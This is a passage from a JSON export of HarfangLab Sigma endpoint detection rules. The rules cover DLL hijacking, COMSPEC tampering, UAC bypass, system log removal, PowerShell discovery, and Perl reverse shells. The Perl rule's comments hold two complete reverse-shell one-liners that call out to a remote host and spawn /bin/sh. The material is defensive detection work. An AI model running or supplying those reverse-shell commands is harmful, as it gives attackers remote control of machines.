"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602174Z",
"creation_date": "2026-03-23T11:45:34.602178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602185Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_recdisc.yml",
"content": "title: DLL Hijacking via recdisc.exe\nid: a2841070-5315-4b34-829e-4f0061d533c0\ndescription: |\n Detects potential Windows DLL Hijacking via recdisc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'recdisc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\ReAgent.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a2841070-5315-4b34-829e-4f0061d533c0",
"rule_name": "DLL Hijacking via recdisc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via recdisc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a31984d3-02cb-47d0-8652-a0456df9c2a6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069598Z",
"creation_date": "2026-03-23T11:45:34.069600Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069605Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_powershell_comspec_tampering.yml",
"content": "title: COMSPEC Tampered via PowerShell\nid: a31984d3-02cb-47d0-8652-a0456df9c2a6\ndescription: |\n Detects tampering with the COMSPEC environment variable in a PowerShell script.\n Attackers may replace the COMSPEC variable to execute an arbitrary binary instead of the default one.\n It is recommended to check for suspicious child processes spawned by the detected process.\nreferences:\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/21\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: '$env:comspec='\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a31984d3-02cb-47d0-8652-a0456df9c2a6",
"rule_name": "COMSPEC Tampered via PowerShell",
"rule_description": "Detects tampering with the COMSPEC environment variable in a PowerShell script.\nAttackers may replace the COMSPEC variable to execute an arbitrary binary instead of the default one.\nIt is recommended to check for suspicious child processes spawned by the detected process.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a31fa0da-8514-4ffd-8ebc-f3557607f34e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613567Z",
"creation_date": "2026-03-23T11:45:34.613570Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613578Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_perl_linux.yml",
"content": "title: Reverse Shell Executed via Perl (Linux)\nid: a31fa0da-8514-4ffd-8ebc-f3557607f34e\ndescription: |\n Detects different suspicious usages of Perl that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to analyze the executed script as well as to look for malicious processes and actions stemming from the perl process.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/10/07\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Perl\n - classification.Linux.Behavior.RemoteShell\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n selection_perl1:\n CommandLine|contains|all:\n - 'perl'\n - ' Socket'\n - 'socket('\n - 'connect('\n - 'open('\n - 'STDIN'\n - 'STDOUT'\n - 'exec('\n\n # perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"[IPADDR]:[PORT]\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n selection_perl2:\n CommandLine|contains|all:\n - 'perl'\n - 'IO::Socket::INET('\n - 'STDIN'\n - 'fdopen('\n - 'system'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a31fa0da-8514-4ffd-8ebc-f3557607f34e",
"rule_name": "Reverse Shell Executed via Perl (Linux)",
"rule_description": "Detects different suspicious usages of Perl that are related to reverse shells.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to analyze the executed script as well as to look for malicious processes and actions stemming from the perl process.\n",
"rule_creation_date": "2022-10-07",
"rule_modified_date": "2025-01-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a324bfe0-f0d4-48ff-8121-a6e10932beaf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074371Z",
"creation_date": "2026-03-23T11:45:34.074373Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074377Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.jpcert.or.jp/en/2015/02/a-new-uac-bypass-method-that-dridex-uses.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_iscsicli.yml",
"content": "title: UAC Bypass Executed via iscsicli\nid: a324bfe0-f0d4-48ff-8121-a6e10932beaf\ndescription: |\n Detects an unusual process being spawned by iscsicli.exe.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n This UAC bypass method abuses the application compatibility databases to force iscsicli.exe to spawn a privileged process.\n The application compatibility database is a file that configures execution rules for applications that have compatibility issues.\n It is recommended to analyze the responsible process and user session for suspicious behavior and to investigate the context in which the parent process was executed to determine legitimacy.\nreferences:\n - https://blogs.jpcert.or.jp/en/2015/02/a-new-uac-bypass-method-that-dridex-uses.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/13\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\iscsicli.exe'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a324bfe0-f0d4-48ff-8121-a6e10932beaf",
"rule_name": "UAC Bypass Executed via iscsicli",
"rule_description": "Detects an unusual process being spawned by iscsicli.exe.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nThis UAC bypass method abuses the application compatibility databases to force iscsicli.exe to spawn a privileged process.\nThe application compatibility database is a file that configures execution rules for applications that have compatibility issues.\nIt is recommended to analyze the responsible process and user session for suspicious behavior and to investigate the context in which the parent process was executed to determine legitimacy.\n",
"rule_creation_date": "2021-01-13",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a3b77de5-b326-4b2f-aeed-40cf697ce819",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080659Z",
"creation_date": "2026-03-23T11:45:34.080661Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080665Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md",
"https://attack.mitre.org/techniques/T1070/002/"
],
"name": "t1070_002_system_logs_removed_fs_linux.yml",
"content": "title: System Logs Removed\nid: a3b77de5-b326-4b2f-aeed-40cf697ce819\ndescription: |\n Detects an attempt to remove any of the system's log, located in '/var/log/'.\n Attackers can try to remove the system's logs to hide their tracks.\n It is recommended to go to the machine's timeline and investigate recent actions that an attacker might be trying to hide.\n If this is the result of an installation or log rotation script, it is highly recommended to whitelist the concerned processes.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md\n - https://attack.mitre.org/techniques/T1070/002/\ndate: 2023/01/02\nmodified: 2026/03/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.002\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind:\n - 'remove'\n - 'rename' # In case the file is moved to the thrash bin\n Path:\n - '/var/log/auth.log'\n - '/var/log/apt/history/log'\n - '/var/log/boot'\n - '/var/log/boot.log'\n - '/var/log/cron.log'\n - '/var/log/dmesg'\n - '/var/log/dpkg.log'\n - '/var/log/kern.log'\n - '/var/log/messages'\n - '/var/log/secure'\n - '/var/log/syslog'\n - '/var/log/utmp'\n - '/var/log/wtmp'\n\n # Filter-out the common case where the file gets too big and is suffixed with\n # an incrementing number or is compressed by a log manager.\n filter_rename_old_logs:\n Kind: 'rename'\n Path|startswith: '/var/log/'\n TargetPath|startswith: '/var/log/'\n\n exclusion_common:\n ProcessImage|endswith:\n - '/bin/syslogd'\n - '/bin/syslog-ng'\n - '/bin/metalog'\n - '/bin/rsyslogd'\n - '/sbin/logrotate'\n - '/lib/systemd/systemd'\n - '/lib/systemd/systemd-journald'\n - '/sbin/auditd'\n - '/bin/dmesg'\n\n # Package managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n 
- ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_template_apt:\n - ProcessImage:\n - '/usr/bin/apt'\n - '/usr/bin/apt-get'\n - ProcessParentImage:\n - '/usr/bin/apt'\n - '/usr/bin/apt-get'\n - ProcessGrandparentImage:\n - '/usr/bin/apt'\n - '/usr/bin/apt-get'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n exclusion_logstash:\n ProcessImage: '/usr/share/logstash/jdk/bin/java'\n\n exclusion_pmlogger:\n # /bin/sh /usr/lib/pcp/bin/pmlogger_check -C\n # /bin/sh -c /usr/libexec/pcp/bin/pmlogger_check -C\n - ProcessParentCommandLine|startswith:\n - '/bin/sh*/usr/lib/pcp/bin/pmlogger_'\n - '/bin/sh*/usr/libexec/pcp/bin/pmlogger_'\n - '/bin/sh*/usr/lib/pcp/bin/pmie_' # (pmie_check, pmie_daily)\n - '/bin/sh*/usr/libexec/pcp/bin/pmie_' # (pmie_check, pmie_daily)\n - ProcessGrandparentCommandLine|startswith:\n - '/bin/sh*/usr/lib/pcp/bin/pmlogger_'\n - '/bin/sh*/usr/libexec/pcp/bin/pmlogger_'\n - '/usr/sbin/crond '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit 
--state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_kaniko:\n ProcessImage|endswith: '/kaniko/executor'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a3b77de5-b326-4b2f-aeed-40cf697ce819",
"rule_name": "System Logs Removed",
"rule_description": "Detects an attempt to remove any of the system's logs, located in '/var/log/'.\nAttackers can try to remove the system's logs to hide their tracks.\nIt is recommended to go to the machine's timeline and investigate recent actions that an attacker might be trying to hide.\nIf this is the result of an installation or log rotation script, it is highly recommended to whitelist the concerned processes.\n",
"rule_creation_date": "2023-01-02",
"rule_modified_date": "2026-03-13",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a3c7686b-301b-438b-a523-df78d8a15b1b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622516Z",
"creation_date": "2026-03-23T11:45:34.622518Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622522Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_powershell_test_netconnection.yml",
"content": "title: Test-NetConnection Cmdlet Executed via PowerShell\nid: a3c7686b-301b-438b-a523-df78d8a15b1b\ndescription: |\n Detects the usage of the Test-NetConnection PowerShell cmdlet.\n Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement.\n It is recommended to check the process activity for other suspicious PowerShell commands execution.\nreferences:\n - https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/11/08\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Test-NetConnection -Comp'\n - 'Test-Connection -Comp'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_path:\n PowershellScriptPath|contains: '\\'\n\n exclusion_wsmprovhost:\n ProcessOriginalFileName: 'wsmprovhost.exe'\n\n exclusion_sense_IR:\n - ProcessParentImage|endswith: 'senseir.exe'\n - ProcessGrandparentImage|endswith: 'senseir.exe'\n\n exclusion_cyberwatch:\n ProcessParentImage|endswith: 'cyberwatch-agent.exe'\n\n exclusion_citrix:\n PowershellScriptPath|endswith: '\\CITRIX_Check_user.ps1'\n\n exclusion_cairnis:\n PowershellScriptPath: '?:\\CairnisAgent\\CAIDB\\WS\\CAIPWS_Command.ps1'\n ProcessGrandparentImage: '?:\\Program Files (x86)\\CairnisAgent\\nvdkit.exe'\n\n exclusion_rgsystem:\n ProcessParentImage: '?:\\Program Files (x86)\\RG-Supervision\\RG_Supervision.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_gehealthcare:\n PowershellScriptPath:\n - '?:\\Program 
Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Networking.ps1'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Networking.ps1'\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Connectivity.ps1'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Connectivity.ps1'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-troubleshooters/introduction-to-troubleshootingscript-toolset-tssv2\n exclusion_tssv2:\n PowershellCommand|contains:\n - '$checkConn = FwTest-TCPport -ComputerName $WebSite -Port 80 -Timeout 900'\n - 'Test-NetConnection -ComputerName $TLStestSite -CommonTCPPort HTTP).TcpTestSucceeded)) { #ToDo: verify - failed on NPS server'\n - '$pubsymsrvcon = Test-NetConnection -ComputerName $PublicSymSrv -CommonTCPPort HTTP -ErrorAction SilentlyContinue -WarningAction SilentlyContinue'\n PowershellScriptPath|endswith:\n - '\\TSSv2.ps1'\n - '\\TSSv2_ADS.psm1'\n - '\\TSSv2_DND.psm1'\n - '\\TSSv2_NET.psm1'\n\n exclusion_NinjaRMMAgent:\n ProcessParentCommandLine: 'cmd.exe /c ?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\*'\n ProcessGrandparentImage|endswith: '\\NinjaRMMAgent.exe'\n\n exclusion_sapien:\n PowershellScriptPath: '?:\\Program Files\\SAPIEN Technologies, Inc\\PowerShell Studio 2022\\Debugger64\\ScriptDriver64.exe'\n\n #exclusion_serviceportalagent:\n # PowershellCommand|contains|all:\n # - 'function Test-WindowsUpdateConnectivity {'\n # - 'Uses Test-NetConnection and Invoke-WebRequest to decide if a device has connectivity to Windows Up'\n # - '$Tcp = Test-NetConnection -ComputerName $TcpUri -Port $Port'\n\n exclusion_open_nebula:\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\OpenNebula\\rhsrvany.exe'\n - '?:\\Program Files\\OpenNebula\\rhsrvany.exe'\n - ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\OpenNebula\\rhsrvany.exe'\n - '?:\\Program Files\\OpenNebula\\rhsrvany.exe'\n\n 
exclusion_icinga:\n PowershellCommand|contains|all:\n - 'Test-IcingaICMPConnection -Hostname '\n - 'Get-IcingaValue -Value $ICMP.ResponseTime -Compare $MinResponseTime -Minimum;'\n - 'have SANs; continue with next ExcludeString in the array'\n\n exclusion_intune:\n # C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe\n ProcessParentOriginalFileName: 'AgentExecutor.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_serviceportalagent:\n ProcessOriginalFileName: 'MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Corporation\"\n\n exclusion_prtg:\n ProcessImage: '?:\\Program Files (x86)\\PRTG Network Monitor\\PowerShellScriptRunner.exe'\n\n exclusion_programfiles:\n - ProcessImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n - ProcessParentImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n exclusion_servicenav:\n ProcessCommandLine|contains: '/scripts-servicenav/'\n\n exclusion_rudder:\n ProcessCommandLine|contains: '?:\\Program Files\\Rudder/bin/rudder.ps1 agent run'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe|'\n - '|?:\\Program Files (x86)\\Microsoft Configuration Manager\\AdminConsole\\bin\\Microsoft.ConfigurationManagement.exe'\n\n exclusion_explorer:\n ProcessParentImage: '?:\\WINDOWS\\Explorer.EXE'\n\n exclusion_omsassessment:\n ProcessOriginalFileName: 'OmsAssessment.exe'\n ProcessSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_winrm:\n ProcessAncestors|contains:\n - '|?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '|?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n\n 
condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a3c7686b-301b-438b-a523-df78d8a15b1b",
"rule_name": "Test-NetConnection Cmdlet Executed via PowerShell",
"rule_description": "Detects the usage of the Test-NetConnection PowerShell cmdlet.\nAdversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement.\nIt is recommended to check the process activity for other suspicious PowerShell command executions.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a3fc0e1e-cea6-465f-92f2-df8319888e07",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089827Z",
"creation_date": "2026-03-23T11:45:34.089829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
